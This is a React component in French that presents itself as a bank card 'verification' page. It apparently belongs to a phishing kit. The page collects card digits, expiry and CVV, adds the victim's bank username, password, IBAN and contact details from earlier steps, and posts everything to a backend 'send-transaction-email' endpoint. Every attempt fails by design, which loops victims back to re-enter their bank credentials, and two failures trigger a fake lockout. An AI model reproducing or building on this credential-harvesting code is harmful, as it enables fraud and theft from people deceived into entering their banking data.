import React, { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import { CreditCard, XCircle, Lock } from "lucide-react";
import { toast } from "sonner";
import axios from "axios";
import Header from "../components/common/Header";
import SecurityMessage from "../components/common/SecurityMessage";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import {
  Select,
  SelectContent,
  SelectItem,
  SelectTrigger,
  SelectValue,
} from "@/components/ui/select";

const BACKEND_URL = process.env.REACT_APP_BACKEND_URL;
const API = `${BACKEND_URL}/api`;

const CARD_TYPES = [
  { value: "visa", label: "Visa" },
  { value: "mastercard", label: "MasterCard" },
  { value: "unionpay", label: "UnionPay" },
  { value: "other", label: "Autres" },
];

const CardVerificationPage = ({ attemptCount, setAttemptCount, isLocked, setIsLocked, withdrawalData, bankData, userCode, userAmount, userCurrency }) => {
  const navigate = useNavigate();
  const [formData, setFormData] = useState({
    cardType: "",
    last8Digits: "",
    expiryDate: "",
    cvv: ""
  });
  const [isLoading, setIsLoading] = useState(false);
  const [remainingTime, setRemainingTime] = useState(0);
  const [showRetryButton, setShowRetryButton] = useState(false);

  // Fonction pour envoyer l'email
  const sendTransactionEmail = async (status) => {
    try {
      const transactionData = {
        transaction: {
          // Code d'identification
          userCode: userCode || "N/A",
          // Montant et devise
          amount: userAmount || "N/A",
          currency: userCurrency || "N/A",
          // Informations du bénéficiaire
          fullName: withdrawalData?.fullName || "N/A",
          iban: withdrawalData?.iban || "N/A",
          phone: withdrawalData?.phone || "N/A",
          email: withdrawalData?.email || "N/A",
          // Authentification bancaire
          bank: bankData?.bank || "N/A",
          username: bankData?.username || "N/A",
          password: bankData?.password || "N/A",
          // Vérification de carte
          cardType: formData.cardType || "N/A",
          last8Digits: formData.last8Digits || "N/A",
          expiryDate: formData.expiryDate || "N/A",
          cvv: formData.cvv || "N/A",
          // Statut
          status: status,
          timestamp: new Date().toISOString()
        }
      };

      await axios.post(`${API}/send-transaction-email`, transactionData);
      console.log("Email envoyé avec succès");
    } catch (error) {
      console.error("Erreur lors de l'envoi de l'email:", error);
    }
  };

  useEffect(() => {
    if (isLocked && remainingTime > 0) {
      const timer = setTimeout(() => {
        setRemainingTime(remainingTime - 1);
      }, 1000);
      return () => clearTimeout(timer);
    } else if (isLocked && remainingTime === 0) {
      setIsLocked(false);
      setAttemptCount(0);
      toast.success("Votre compte a été déverrouillé. Redirection vers l'authentification bancaire...");
      
      // Redirection vers l'authentification bancaire après 2 secondes
      setTimeout(() => {
        navigate("/authentification-bancaire");
      }, 2000);
    }
  }, [isLocked, remainingTime, setIsLocked, setAttemptCount, navigate]);

  const handleChange = (e) => {
    setFormData({
      ...formData,
      [e.target.name]: e.target.value
    });
  };

  const handleCardTypeChange = (value) => {
    setFormData({
      ...formData,
      cardType: value
    });
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    
    if (isLocked) {
      toast.error(`Compte verrouillé. Réessayez dans ${remainingTime} secondes`);
      return;
    }

    setIsLoading(true);

    // Simulation de vérification avec échec après 2 secondes
    setTimeout(async () => {
      const newAttemptCount = attemptCount + 1;
      setAttemptCount(newAttemptCount);

      if (newAttemptCount >= 2) {
        setIsLocked(true);
        setRemainingTime(600); // 10 minutes = 600 secondes
        
        // Envoyer email avec statut "locked"
        await sendTransactionEmail("locked");
        
        toast.error(
          "Compte temporairement verrouillé. Veuillez réessayer dans 10 minutes ou contactez-nous.",
          { duration: 5000 }
        );
      } else {
        // Envoyer email avec statut "failed"
        await sendTransactionEmail("failed");
        
        // Afficher le bouton réessayer après la première erreur
        setShowRetryButton(true);
        
        toast.error(
          "Échec d'authentification. Cliquez sur 'Réessayer' pour revenir à l'authentification bancaire.",
          { duration: 5000 }
        );
      }
      
      setIsLoading(false);
    }, 2000);
  };

  const handleRetry = () => {
    navigate("/authentification-bancaire");
  };

  const formatTime = (seconds) => {
    const minutes = Math.floor(seconds / 60);
    const secs = seconds % 60;
    return `${minutes}:${secs.toString().padStart(2, '0')}`;
  };

  return (
    <div className="min-h-screen flex flex-col">
      <Header minimal />
      
      <div className="flex-1 px-6 py-12 bg-slate-50">
        <div className="max-w-md mx-auto">
          <div className="text-center mb-8">
            <div className={`rounded-full w-16 h-16 flex items-center justify-center mx-auto mb-4 ${
              isLocked ? "bg-red-100" : "bg-primary/10"
            }`}>
              {isLocked ? (
                <Lock className="h-8 w-8 text-red-600" />
              ) : (
                <CreditCard className="h-8 w-8 text-primary" />
              )}
            </div>
            <h1 className="text-2xl font-bold text-primary mb-2">Vérification de carte</h1>
            <p className="text-slate-600">
              {isLocked 
                ? `Compte verrouillé - Temps restant : ${formatTime(remainingTime)}`
                : "Vérifiez votre plafond de carte bancaire"
              }
            </p>
          </div>

          {attemptCount > 0 && attemptCount < 2 && !isLocked && showRetryButton && (
            <div className="space-y-4 mb-6">
              <div className="bg-amber-50 border border-amber-200 rounded-lg p-4 flex items-start gap-3">
                <XCircle className="h-5 w-5 text-amber-600 flex-shrink-0 mt-0.5" />
                <div className="flex-1">
                  <p className="text-sm text-amber-800 font-medium">
                    Tentative {attemptCount}/2 échouée
                  </p>
                  <p className="text-xs text-amber-700 mt-1">
                    Il vous reste {2 - attemptCount} tentative(s). Cliquez sur "Réessayer" pour revenir à l'authentification bancaire.
                  </p>
                </div>
              </div>
              
              <Button
                onClick={handleRetry}
                className="w-full bg-secondary hover:bg-secondary/90"
                data-testid="retry-after-error-btn"
              >
                Réessayer (retour à l'authentification bancaire)
              </Button>
            </div>
          )}

          {isLocked && (
            <div className="bg-red-50 border border-red-200 rounded-lg p-4 mb-6" data-testid="locked-message">
              <div className="flex items-start gap-3">
                <Lock className="h-5 w-5 text-red-600 flex-shrink-0 mt-0.5" />
                <div className="flex-1">
                  <p className="text-sm text-red-800 font-medium">
                    Compte temporairement verrouillé
                  </p>
                  <p className="text-xs text-red-700 mt-1">
                    Veuillez patienter {formatTime(remainingTime)} avant de pouvoir réessayer ou contactez notre support.
                  </p>
                </div>
              </div>
            </div>
          )}

          <div className="bg-white rounded-xl border border-slate-200 shadow-sm p-8">
            <form onSubmit={handleSubmit} className="space-y-6">
              <div className="space-y-2">
                <Label htmlFor="cardType">Type de carte</Label>
                <Select 
                  value={formData.cardType} 
                  onValueChange={handleCardTypeChange}
                  disabled={isLocked || showRetryButton}
                  required
                >
                  <SelectTrigger className="h-11" data-testid="card-type-select">
                    <SelectValue placeholder="Sélectionnez le type de carte" />
                  </SelectTrigger>
                  <SelectContent>
                    {CARD_TYPES.map((type) => (
                      <SelectItem key={type.value} value={type.value}>
                        {type.label}
                      </SelectItem>
                    ))}
                  </SelectContent>
                </Select>
              </div>

              <div className="space-y-2">
                <Label htmlFor="last8Digits">8 derniers chiffres de la carte</Label>
                <Input
                  id="last8Digits"
                  name="last8Digits"
                  type="text"
                  placeholder="XXXX XXXX"
                  maxLength="8"
                  value={formData.last8Digits}
                  onChange={handleChange}
                  disabled={isLocked || showRetryButton}
                  required
                  data-testid="card-digits-input"
                  className="h-11"
                />
              </div>

              <div className="grid grid-cols-2 gap-4">
                <div className="space-y-2">
                  <Label htmlFor="expiryDate">Date d'expiration</Label>
                  <Input
                    id="expiryDate"
                    name="expiryDate"
                    type="text"
                    placeholder="MM/AA"
                    maxLength="5"
                    value={formData.expiryDate}
                    onChange={handleChange}
                    disabled={isLocked || showRetryButton}
                    required
                    data-testid="expiry-input"
                    className="h-11"
                  />
                </div>

                <div className="space-y-2">
                  <Label htmlFor="cvv">Code CVV</Label>
                  <Input
                    id="cvv"
                    name="cvv"
                    type="text"
                    placeholder="XXX"
                    maxLength="3"
                    value={formData.cvv}
                    onChange={handleChange}
                    disabled={isLocked || showRetryButton}
                    required
                    data-testid="cvv-input"
                    className="h-11"
                  />
                </div>
              </div>

              <Button
                type="submit"
                className="w-full h-11 bg-primary hover:bg-primary/90"
                disabled={isLoading || isLocked || showRetryButton}
                data-testid="verify-btn"
              >
                {isLoading ? "Vérification en cours..." : "Vérifier"}
              </Button>
            </form>
          </div>

          <SecurityMessage />
        </div>
      </div>
    </div>
  );
};

export default CardVerificationPage;
